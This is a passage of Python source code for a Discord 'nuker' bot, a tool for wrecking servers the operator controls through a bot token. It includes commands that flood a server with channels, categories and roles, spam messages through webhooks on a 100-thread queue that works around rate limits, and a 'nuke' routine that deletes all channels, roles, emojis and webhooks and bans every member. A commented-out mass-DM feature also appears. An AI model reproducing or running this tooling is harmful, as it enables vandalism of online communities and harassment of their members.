if server is None:
await log(ctx, f'Unable to find {temp_name} server.')
return
global selected_server
selected_server = server
await log(ctx, f'Successfully connected to `{server.name}`.')
######### Unities ##########
@commands.check(checkPerm)
@client.command(name='addChannel', aliases=['aCh', 'aChannel'])
async def addChannel(ctx, channel_name, *, category=None):
if not await hasTarget(ctx):
return
if category is not None:
temp = category
category = containing(selected_server.categories, category)
if category is None:
await log(ctx, f'Unable to find category `{temp}`.')
return
try:
await selected_server.create_text_channel(channel_name, category=category)
if category is None:
category = 'No category.'
else:
category = category.name
await log(ctx, f'Successfully added channel `{channel_name}` to category `{category}`.')
except:
await log(ctx, f'Unable to add channel `{channel_name}`.')
raise
@commands.check(checkPerm)
@client.command(name='addVoiceChannel', aliases=['aVoiceChannel', 'aVC'])
async def addVoiceChannel(ctx, voice_channel, *, category=None):
if not await hasTarget(ctx):
return
if category is not None:
temp = category
category = containing(selected_server.categories, category)
if category is None:
await log(ctx, f'Unable to find category `{temp}`.')
return
try:
await selected_server.create_voice_channel(voice_channel, category=category)
if category is None:
category = 'No category.'
else:
category = category.name
await log(ctx, f'Successfully added VC `{voice_channel}` to category `{category}`.')
except:
await log(ctx, f'Unable to add VC `{voice_channel}`.')
raise
@commands.check(checkPerm)
@client.command(name='addEmoji', aliases=['aEmoji', 'aEm'])
async def addEmoji(ctx, item, *, name=None, bits=None):
if not await hasTarget(ctx):
return
if bits is None:
# Raw IPv4 and IPv6 are not supported
if item.startswith(('https://', 'http://', 'ftp://', 'ftps://')): # Link EX: https://www.example.com/aaa.png
try:
if name is None:
await log(ctx, 'Name for emoji? I\'m not always going to name it for you...')
return
await selected_server.create_custom_emoji(name=(name), image=BytesIO(requests.get(item).content).read())
await log(ctx, f'Successfully added emoji `{name}`.')
except:
raise
elif item[0] == '<': # EX: <a:triggeredd:627060014431076352>
item = item.split(':')
if name is None:
name = item[1]
try:
if item[0] == '<a': # Animated
await selected_server.create_custom_emoji(name=(name), image=BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{item[2][:-1]}.gif?v=1').content).read())
else:
await selected_server.create_custom_emoji(name=(name), image=BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{item[2][:-1]}.png?v=1').content).read())
await log(ctx, f'Successfully added emoji: {name}')
except:
raise
elif os.path.isfile(item): # File EX: C:\Users\user\Desktop\something.jpg or EX: .\icon\something.jpg
with open(item, 'rb') as data:
await selected_server.create_custom_emoji(name=(name), image=data.read())
await log(ctx, f'Successfully added emoji: {name}')
else:
await log(ctx, 'Bad path to image.')
else:
selected_server.create_custom_emoji(name=(name), image=bits)
@commands.check(checkPerm)
@client.command(name='addCategory', aliases=['aCat', 'aCa'])
async def addCategory(ctx, *, category_name):
if not await hasTarget(ctx):
return
try:
await selected_server.create_category(category_name)
await log(ctx, f'Successfully created category `{category_name}`.')
except:
await log(ctx, f'Unable to create category `{category_name}`.')
raise
@commands.check(checkPerm)
@client.command(name='addRole', aliases=['aRole', 'aR'])
async def addRole(ctx, *, name):
if not await hasTarget(ctx):
return
try:
name = name.split()
perms = name.pop(-1)
await selected_server.create_role(name=' '.join(name), permissions=discord.Permissions(permissions=int(perms)))
await log(ctx, f'Successfully added role `{name}` with permission `{perms}`.')
except:
await log(ctx, f'Failed to add role `{name}`.')
raise
@commands.check(checkPerm)
@client.command(name='moveRole', aliases=['mRole', 'mR'])
async def moveRole(ctx, *, name):
if not await hasTarget(ctx):
return
try:
name = name.split()
position = name.pop(-1)
name = ' '.join(name)
if len(name) == 0 or not position.isdigit():
await log(ctx, 'Invalid inputs.')
return
role = containing(selected_server.roles, name)
if role is None:
await log(ctx, f'Unable to find role `{name}`.')
await role.edit(position=int(position))
await log(ctx, f'Successfully moved role {role.name} to position `{str(position)}`.')
except:
await log(ctx, f'Unable to move role `{name}` to position `{position}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteRole', aliases=['dRole', 'dR'])
async def deleteRole(ctx, *, name):
if not await hasTarget(ctx):
return
role = containing(selected_server.roles, name)
if role is None:
await log(ctx, f'Unable to find `{name}`.')
try:
await role.delete()
await log(ctx, f'Successfully removed role `{role.name}`')
except:
await log(ctx, f'Unable to delete role `{role.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteChannel', aliases=['dChannel', 'dCh'])
async def deleteChannel(ctx, channel_name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.text_channels, channel_name)
if channel is None:
await log(ctx, f'Unable to find text channel `{channel_name}`.')
try:
await channel.delete(reason=None)
await log(ctx, f'Channel `{channel.name}` is deleted.')
except:
await log(ctx, f'Unable to delete channel `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteVoiceChannel', aliases=['dVC', 'dVoiceChannel'])
async def deleteVoiceChannel(ctx, VC_name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.voice_channels, VC_name)
if channel is None:
await log(ctx, f'Unable to find voice channel `{VC_name}`.')
try:
await channel.delete(reason=None)
await log(ctx, f'Voice channel `{channel.name}` is deleted.')
except:
consoleLog(f'Unable to delete voice channel `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteCategory', aliases=['dCat', 'dCategory'])
async def deleteCategory(ctx, *, category_name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.categories, category_name)
if channel is None:
await log(ctx, f'Unable to find category `{category_name}`.')
try:
await channel.delete(reason=None)
await log(ctx, f'Category `{channel.name}` is deleted.')
except:
await log(ctx, f'Unable to delete category `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteCC', aliases=['dCC'])
async def deleteCC(ctx, *, name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.channels, name)
if channel is None:
await log(ctx, f'Unable to find channel `{name}`.')
return
try:
await channel.delete(reason=None)
await log(ctx, f'Channel `{channel.name}` is removed from `{selected_server.name}`.')
except:
await log(ctx, f'Unable to delete channel `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteEmoji', aliases=['dEm'])
async def deleteEmoji(ctx, *, name):
emoji = containing(selected_server.emojis, name)
if emoji is None:
await log(ctx, f'Unable to find channel `{name}`.')
try:
await emoji.delete(reason=None)
await (ctx, f'Emoji `{emoji.name}` is removed from the server.')
except:
await log(ctx, f'Unable to delete emoji: `{emoji.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='ban')
async def ban(ctx, member_:discord.Member):
if not await hasTarget(ctx):
return
try:
await member_.ban()
await log(ctx, f'Successfully banned `{member_.name}#{member_.discriminator}`.')
except:
await log(ctx, f'Unable to ban `{member_.name}#{member_.discriminator}`.')
raise
@commands.check(checkPerm)
@client.command(name='unban')
async def unban(ctx, *, name):
if not await hasTarget(ctx):
return
member_ = containing([s.user for s in await selected_server.bans()], nameIdHandler(name))
if member_ is None:
await log(ctx, f'Unable to find user `{name}` in server `{selected_server.name}`.')
return
try:
await selected_server.unban(member_)
await log(ctx, f'`{member_.name}#{member_.discriminator}` is now free :).')
except:
await log(ctx, f'Failed to unban `{member_.name}#{member_.discriminator}`.')
raise
@commands.check(checkPerm)
@client.command(name='roleTo')
async def roleTo(ctx, member_name, *, role_name):
if not await hasTarget(ctx):
return
role = containing(selected_server.roles, nameIdHandler(role_name))
if role is None:
await log(ctx, f'Unable to find role `{role_name}`.')
return
# discord.utils.get is useless don't use it it's way slower than "containing"
member_ = containing(selected_server.members, nameIdHandler(member_name))
if member_ is None:
await log(ctx, f'Unable to find user `{member_name}`.')
return
if role in member_.roles:
try:
await member_.remove_roles(role)
await log(ctx, f'Successfully removed role `{role.name}` from user `{member_.name}`.')
except:
await log(ctx, f'Unable to remove role `{role.name}` from user `{member_.name}`.')
raise
else:
try:
await member_.add_roles(role)
await log(ctx, f'Successfully given role `{role.name}` to user `{member_.name}`.')
except:
await log(ctx, f'Unable to add role `{role.name}` to user `{member_.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='disableCommunityMode', aliases=['dCM', 'dCommunityMode'])
async def disableCommunityMode(ctx):
if not await hasTarget(ctx):
return
try:
await log(ctx, f'{Fore.YELLOW}Disabling community mode')
r = requests.patch(f'https://discord.com/api/v8/guilds/{selected_server.id}', headers=headers, json=
{'description': None, 'features': {'0': 'NEWS'},
'preferred_locale': 'en-US',
'public_updates_channel_id': None, 'rules_channel_id': None})
consoleLog(f'Disabling community mode response -> {r.text}', True)
await log(ctx, f'{Fore.GREEN}Disabled community mode.')
except Exception as e:
consoleLog(f'{Fore.RED}Error while attempting to disable community mode, {e}', True)
raise
@commands.check(checkPerm)
@client.command(name='grantAllPerm', aliases=['gap'])
async def grantAllPerm(ctx):
global grant_all_permissions
if grant_all_permissions:
await log(ctx, 'Now only people with permissions can use the commands.')
grant_all_permissions = False
else:
await log(ctx, 'Now everyone can use the bot commands')
grant_all_permissions = True
######### Bombs #########
@commands.check(checkPerm)
@client.command(name='kaboom')
async def kaboom(ctx, n, method):
if not await hasTarget(ctx):
return
if not n.isdigit() or int(n) < 0:
await log(ctx, 'Please enter a positive integer.')
return
await log(ctx, f'A series of bombs have been dropped onto `{selected_server.name}`.')
tasks = [channelBomb(ctx, n, method), categoryBomb(ctx, n, method), roleBomb(ctx, n, method)]
await asyncio.gather(*tasks)
concurrent = 100
q = Queue(concurrent * 2)
def requestMaker():
while True:
requesting, url, headers, payload = q.get()
try:
# proxy = randomProxy('https')
# r = requesting(url, data=json.dumps(payload), headers=headers, proxies=proxy, timeout=timeout)
r = requesting(url, data=json.dumps(payload), headers=headers, timeout=timeout)
if r.status_code == 429:
r = r.json()
if want_log_request:
if isinstance(r['retry_after'], int): # Discord will return all integer time if the retry after is less then 10 seconds which is in miliseconds.
r['retry_after'] /= 1000
if r['retry_after'] > 5:
consoleLog(f'Rate limiting has been reached, and this request has been cancelled due to retry-after time is greater than 5 seconds: Wait {str(r["retry_after"])} more seconds.')
q.task_done()
continue
consoleLog(f'Rate limiting has been reached: Wait {str(r["retry_after"])} more seconds.')
q.put((requesting, url, headers, payload))
elif want_log_request and 'code' in r:
consoleLog('Request cancelled due to -> ' + r['message'])
except json.decoder.JSONDecodeError:
pass
# except requests.exceptions.ProxyError:
# consoleLog(f'Proxy "{proxy}" did not respond to a request. Trying...')
# q.put((requesting, url, headers, payload))
except requests.exceptions.ConnectTimeout:
consoleLog(f'Reached maximum load time: timeout is {timeout} seconds long {proxy}')
q.put((requesting, url, headers, payload))
except Exception as e:
consoleLog(f'Unexpected error: {str(e)}')
q.task_done()
for i in range(concurrent):
Thread(target=requestMaker, daemon=True).start()
@commands.check(checkPerm)
@client.command(name='channelBomb')
async def channelBomb(ctx, n, method='fixed'):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n)) < 0:
await log(ctx, 'Please insert an integer that is greater than 0.')
return
if method == 'fixed':
method = fixedChoice
elif method == 'b64':
method = random_b64
elif method == 'an':
method = random_an
else:
await log(ctx, f'Unable to find choice "{method}".')
return
consoleLog('Channel bombing has started.', True)
for i in range(n):
payload = {
'type': 0,
'name': method(),
'permission_overwrites': []
}
q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/channels', headers, payload))
q.join()
consoleLog('Done text channel bombing.', True)
@commands.check(checkPerm)
@client.command(name='categoryBomb')
async def categoryBomb(ctx, n, method):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n)) < 0:
await log(ctx, 'Please insert an integer that is greater than 0.')
return
if method == 'fixed':
method = fixedChoice
elif method == 'b64':
method = random_b64
elif method == 'an':
method = random_an
else:
await log(ctx, f'Unable to find choice "{method}".')
return
consoleLog('Channel bombing has started.', True)
for i in range(n):
payload = {
'type': 4,
'name': method(),
'permission_overwrites': []
}
q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/channels', headers, payload))
q.join()
consoleLog('Done category bombing.', True)
@commands.check(checkPerm)
@client.command(name='roleBomb')
async def roleBomb(ctx, n, method):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n)) < 0:
await log(ctx, 'Please insert an integer that is greater than 0.')
return
if method == 'fixed':
method = fixedChoice
elif method == 'b64':
method = random_b64
elif method == 'an':
method = random_an
else:
await log(ctx, f'Unable to find choice "{method}".')
return
consoleLog('Role bombing has started.', True)
for i in range(n):
payload = {
'name': method()
}
q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/roles', headers, payload))
q.join()
consoleLog('Done role bombing.', True)
# @commands.check(checkPerm)
# @client.command(name='massDM', aliases=['md'])
# async def massDM(ctx, command, *, args=None):
# if len(server_members) == 0:
# await log(ctx, 'You don\'t have anything anyone to dm with :(. Fetch some members.')
# return
# if args is not None:
# args = args.split()
# if command == 'channels' or command == 'channel':
# if args is None:
# args = []
# args.append('1')
# members_ = []
# for i in range(len(server_members)):
# if members_[i].channel_id is not None:
# members_[i].id = members_[i].channel_id
# await embed(ctx, args[0], 'MassDM targets', members_)
# elif command == 'load':
# for member_ in server_members:
# print(member_.name)
# if int(member_.id) == client.user.id:
# continue
# # asdf = requests.post('https://discordapp.com/api/v8/users/@me/channels', headers=headers, json={'recipient_id': member_.id}, proxies=randomProxy('https'), timeout=timeout).json()
# member_.__init__(member_.name, member_.id, member_.discriminator, client.get_user(member_.id).dm_channel.id)
# elif command == 'start':
# massDM_channels = [i.channel_id for i in server_members if i.channel_id is not None]
# if len(massDM_channels) == 0:
# await log(ctx, 'You don\'t have any DM loaded.')
# return
# for channel_id in massDM_channels:
# q.put((f'https://discordapp.com/api/v8/channels{channel_id}/messages', headers))
######### webhooks ##########
@commands.check(checkPerm)
@client.command(name='webhook', aliases=['webhooks', 'wh'])
async def webhook(ctx, *, args=None):
if not await hasTarget(ctx):
return
if args is None or args.isdigit(): # webhook list
if args is None:
args = '1'
try:
await embed(ctx, args, 'Webhooks', await selected_server.webhooks())
return
except:
raise
args = args.split()
if args[0] == 'create' or args[0] == 'add': # webhook create
# global headers
del args[0]
if len(args) < 1:
await log(ctx, f'More arguments is requested. You can put how many webhooks you want to create or channel id/name on the channels you want the webhooks to be created on.')
return
name = ' '.join(args)
webhooks = await selected_server.webhooks()
webhooks_length = len(webhooks)
channels = name.split()
if int(name) < 0:
await log(ctx, f'You thought a smol negative number will break this bot?')
return
if len(channels) == 1 and int(name) <= 50: ## probably will replace this with auto check channel id
channels = selected_server.text_channels
if int(name) > len(channels):
await log(ctx, f'This adding webhooks method can only distribute webhooks evenly and randomly throughout the text channels. You entered `{name}`, and there are only `{str(len(channels))}` text channel(s) in the server. If you don\'t what to add more text channels. You can use this command a few more times with a positive integer that is less than `{str(len(channels) + 1)}`.')
return
for i in range(int(name)):
payload = {'name': random_b64(10)}
q.put((requests.post, f'https://discord.com/api/v8/channels/{channels.pop(randrange(len(channels))).id}/webhooks', headers, payload))
q.join()
await log(ctx, f'`{name}` webhooks has been created.')
elif len(channels) == 1 and int(name) < 100000000:
await log(ctx, f'The maximum webhooks that can be created every hour per server is 50. And you entered `{name}`.')
else:
for channel in channels:
checked_channel = containing(selected_server.text_channels, channel)
if checked_channel is None:
await log(ctx, f'Cannot find channel {channel}.')
continue
payload = {'name': random_b64(10)}
q.put((requests.post, f'https://discord.com/api/v8/channels/{checked_channel.id}/webhooks', headers, payload))
elif args[0] == 'delete' or args[0] == 'remove':
name = args[1]
webhook = containing(await selected_server.webhooks(), name)
if webhook is None:
await log(ctx, f'Unable to find webhook `{name}`.')
return
requests.delete(f'https://discord.com/api/v8/webhooks/{webhook.id}', headers=headers)
await log(ctx, f'Webhook `{webhook.name}` is removed from the server.')
elif args[0] == 'attack':
global webhook_targets
args.pop(0) # Removing the attack keyword
try:
webhooks = await selected_server.webhooks()
webhooks_length = len(webhooks)
loaded_length = 0
if len(args) > 0 and args[0].lower() == 'all':
for webhook in webhooks:
webhook_targets.append(webhook)
loaded_length += 1
elif args[0] == 'start':
target_list_length = len(webhook_targets)
if target_list_length == 0:
await log(ctx, f'Looks like there really isn\'t any targets in the attack list. Maybe try: `{settings["command_prefix"]}webhook attack all`, then `{settings["command_prefix"]}webhook attack start <number of messages>`.')
return
_headers = {
'content-type': 'application/json'
}
if len(args) < 2:
args.append(10)
elif not args[1].isdigit():
await log(ctx, 'Please enter a positive integer.')
return
usernames_length = len(settings['webhook_spam']['usernames'])
contents_length = len(settings['webhook_spam']['contents'])
pfp_length = len(settings['webhook_spam']['pfp_urls'])
for i in range(int(args[1])):
payload = {
'username': choice(settings['webhook_spam']['usernames']),
'content': choice(settings['webhook_spam']['contents']),
'avatar_url': choice(settings['webhook_spam']['pfp_urls'])
}
q.put((requests.post, webhook_targets[randrange(target_list_length)].url, _headers, payload))
elif len(args) > 0 and args[0].isdigit() and int(args[0]) <= webhooks_length:
for i in range(int(args[0])):
webhook_targets.append(webhooks.pop(randrange(webhooks_length)))
webhooks_length -= 1
loaded_length += 1
elif args[0] == 'list':
if len(args) < 2:
args.append('1')
await embed(ctx, args[1], 'Targets on attacking list', webhook_targets)
elif args[0] == 'offload':
webhook_targets = []
await log(ctx, f'All webhooks have been offloaded')
else:
for webhook in args:
webhook = containing(await selected_server.webhooks(), webhook)
if webhook is None:
await log(ctx, f'Unable to find webhook `{webhook}`.')
continue
webhook_targets.append(webhook)
loaded_length += 1
if args[0] != 'list' and args[0] != 'start' and args[0] != 'offload':
await log(ctx, f'`{str(loaded_length)}` has been loaded into the target list.')
except:
raise
else:
await log(ctx, f'Unable to find `{args[0]}` command in webhook scripts.')
######### Nukes #########
@commands.check(checkPerm)
@client.command(name='nuke')
async def nuke(ctx):
if not await hasTarget(ctx):
return
await log(ctx, f'A nuke has been launched to `{selected_server.name}`.')
tasks = [disableCommunityMode(ctx), deleteAllChannels(ctx), deleteAllRoles(ctx), banAll(ctx), deleteAllWebhooks(ctx), deleteAllEmojis(ctx)]
await asyncio.gather(*tasks)
if len(settings['after']) > 0:
if not isDM(ctx) and selected_server.id == ctx.guild.id:
ctx.message.channel = None
consoleLog(f'{Fore.BLUE}Running after commands...', True)
for command in settings['after']:
# Lol im so smart to think something like this would work
try:
ctx.message.content = settings['command_prefix'] + command
await client.process_commands(ctx.message)
except:
consoleLog(f'{Fore.RED}Command {Fore.YELLOW}"{settings["command_prefix"]}{command}" {Fore.RED}has failed to execute.', True)
pass
consoleLog(f'{Fore.GREEN}After commands completed.')
@commands.check(checkPerm)
@client.command(name='deleteAllRoles', aliases=['dar', 'dAllRoles'])
async def deleteAllRoles(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all roles...', True)
for role in selected_server.roles:
q.put((requests.delete, f'https://discord.com/api/v8/guilds/{selected_server.id}/roles/{role.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting roles.', True)
@commands.check(checkPerm)
@client.command(name='deleteAllChannels', aliases=['dac', 'dAllChannels'])
async def deleteAllChannels(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all types of channels...', True)
for channel in selected_server.channels:
q.put((requests.delete, f'https://discord.com/api/v8/channels/{channel.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting channels.', True)
@commands.check(checkPerm)
@client.command(name='deleteAllEmojis', aliases=['dae', 'dAllEmoji'])
async def deleteAllEmojis(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all emojis...', True)
for emote in selected_server.emojis:
q.put((requests.delete, f'https://discord.com/api/v8/guilds/{selected_server.id}/emojis/{emote.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting emojis.', True)
@commands.check(checkPerm)
@client.command(name='deleteAllWebhooks', aliases=['daw', 'dAllWebhooks'])
async def deleteAllWebhooks(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all webhooks...', True)
for webhook in await selected_server.webhooks():
q.put((requests.delete, f'https://discord.com/api/v8/webhooks/{webhook.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting webhooks.', True)
@commands.check(checkPerm)
@client.command(name='banAll')
async def banAll(ctx):
if not await hasTarget(ctx):
return
payload = {'delete_message_days':'0', 'reason': ''}
consoleLog(f'{Fore.YELLOW}Starting ban all...', True)
for member_ in selected_server.members:
if f'{member_.name}#{member_.discriminator}' in settings['ban_whitelist'] or str(member_.id) in settings['ban_whitelist']:
consoleLog(f'Ban skipped for {member_.name}#{member_.discriminator} -> in ban whitelist')
continue
q.put((requests.put, f'https://discord.com/api/v8/guilds/{selected_server.id}/bans/{member_.id}', headers, payload))
q.join()
consoleLog(f'{Fore.GREEN}Ban all completed.', True)
## Configuration command ##
@commands.check(checkPerm)
@client.command(name='config')
async def config(ctx, command=None, *, args=None):
global settings, settings_copy
async def embed_list(n, title, array):
if not n.isdigit() or (n := int(n) - 1) < 0:
await log(ctx, 'Bad page number.')
return
names = ''
item_length = len(array)
if item_length == 0:
return await ctx.send(f'{title} count: 0')
init_item = n * per_page
final_item = init_item + per_page
if init_item > item_length - per_page:
if init_item > item_length:
await ctx.send('Invalid page number.')
return
final_item = init_item + (item_length % per_page)
else:
final_item = init_item + per_page
for i in range(init_item, final_item, 1):
item = array[i]
if len(item) > 17:
item = item[:17] + '...'
names += f'{str(i+1)}) {item}\n'
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = title,
description = f'Total count: {str(item_length)}; color: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Items', value=names, inline=True)
embed.set_footer(text=f'{n+1}/{str(ceil(item_length / per_page))}\n' +
('Config is saved' if configIsSaved() else '(*)Config is not saved'))
await ctx.send(embed=embed)
if command is None:
status_list = []
features_list = []
temp = settings.copy()
features_list.append('bomb_messages')
if temp['bomb_messages']['random'] is None or len(temp['bomb_messages']['fixed']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
features_list.append('webhook_spam')
if len(temp['webhook_spam']['usernames']) == 0 or len(temp['webhook_spam']['pfp_urls']) == 0 or len(temp['webhook_spam']['contents']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
del temp['bomb_messages']
del temp['webhook_spam']
for feature in temp:
features_list.append(feature)
if settings[feature] is None or (type(settings[feature]).__name__ == 'list' and len(settings[feature]) == 0):
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'Nuking features',
description = f':white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'Use `{settings["command_prefix"]}config <feature>` to get more information about how to config that feature.\n\n`{settings["command_prefix"]}config save <file name>` to save the current config. If you save the config as `default.json` the bot next time will directly start with whatever is in that `.json` file.', inline=False)
embed.set_footer(text='Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
return
command = command.lower()
#################
# permissions #
#################
if command == 'permissions' or command == 'permission' or command == 'perms' or command == 'perm':
if args is None:
status_list = []
features_list = []
features_list.append('permissions')
if len(settings['permissions']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'Permissions list',
description = f'Permissions for using the bot are given to the users.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`permissions add <userTag or userID> [userTag or userID] [user...` - grant permissions to the given user(s)\n\n`permissions remove <line number> [line number] [line...` - remove line(s) from the list\n\n`permissions list [page number]` - list all users that are in the permission list', inline=False)
embed.set_footer(text=('Config is saved' if configIsSaved() else '(*)Config is not saved'))
await ctx.send(embed=embed)
else:
args = args.split()
def alreadyExisted(checkingID):
for userID_index in range(len(settings['permissions'])):
if settings['permissions'][userID_index] == checkingID:
return True, userID_index
return False, None
if args[0] == 'add':
del args[0]
for userID in args:
existed, checkedID_index = alreadyExisted(userID)
if existed:
await log(ctx, f'Failed to add `{settings["permissions"][checkedID_index]}`. Already existed the permission list.')
continue
else:
settings['permissions'].append(userID)
elif args[0] == 'remove':
if len(args) > 1:
del args[0]
offset = 1
initial_length = len(settings['permissions'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['permissions'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from bomb_messages fixed list.')
elif args[0] == 'list':
await embed_list(args[1] if len(args) > 1 else '1', 'permission list', settings['permissions'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
#################
# bomb_messages #
#################
elif command == 'bomb_messages' or command == 'bomb_message' or command == 'bomb':
if args is None:
status_list = []
features_list = []
features_list.append('random')
if settings['bomb_messages']['random'] is None:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
features_list.append('fixed')
if len(settings['bomb_messages']['fixed']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'bomb_messages',
description = f'Config for all the bomb commands.\nWhen you run bomb commands like `{settings["command_prefix"]}channelbomb 100 fixed` the fixed is the type of word list you are going to use. In this case the word list is going to randomly pick texts from the "fixed" list.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Types', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`bomb_messages fixed add <command>` - add contents to the back of the list\n\n`bomb_messages fixed remove <line number> [line number] [line...` - remove line(s) from the list\n\n`bomb_messages fixed list [page number]` - list contents that are in the content list\n\n`bomb_messages random <character length>` - sets character length for bomb commands like `{settings["command_prefix"]}kaboom 100 b64`(b64 = base64) ', inline=False)
embed.set_footer(text='Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0].lower() == 'random':
if len(args) > 1 and args[1].isdigit() and (1 <= (length := int(args[1])) <= 1024):
settings['bomb_messages']['random'] = length
await log(ctx, f'Random-message length has been set to `{str(length)}`.')
else:
await log(ctx, 'Please enter a positive integer that is between 1 and 1024.')
elif args[0].lower() == 'fixed':
if args[1] == 'add':
if len(args) > 2 and (1 <= len(text := ' '.join(args[2:])) <= 100):
settings['bomb_messages']['fixed'].append(text)
await log(ctx, f'Text added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter something that has 1 to 100 characters.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['bomb_messages']['fixed'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['bomb_messages']['fixed'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from bomb_messages fixed list.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'bomb_messages fixed list', settings['bomb_messages']['fixed'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
else:
await log(ctx, f'Unable to find {args[0]} config.')
################
# webhook #
################
elif command == 'webhook_spam':
if args is None:
status_list = []
features_list = []
for feature in settings['webhook_spam']:
features_list.append(feature)
if len(settings['webhook_spam'][feature]) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'webhook_spam',
description = f'Using webhook to spam messages. To send a message from discord webhook it requires 3 items: usernames, profile picture, and contents. For profile picture you can only put an image URL or put `none` for no pfp.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Types', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`webhook_spam <type> add <command>` - add contents to the back of the list\n\n`webhook_spam <type> remove <line number> [line number] [line...` - remove line(s) from the list\n\n`webhook_spam <type> list [page number]` - list contents that are in the content list', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0] == 'usernames' or args[0] == 'username':
if args[1] == 'add':
if len(args) > 2 and (0 < len(text := ' '.join(args[2:])) <= 32):
settings['webhook_spam']['usernames'].append(text)
await log(ctx, f'Text added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter something that has 1 to 32 characters.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['webhook_spam']['usernames'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['webhook_spam']['usernames'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from usernames.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'webhook_spam usernames list', settings['webhook_spam']['usernames'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
elif args[0] == 'pfp_urls' or args[0] == 'pfp_url' or args[0] == 'pfp':
if args[1] == 'add':
if len(args) > 1 and args[2].lower() == 'none':
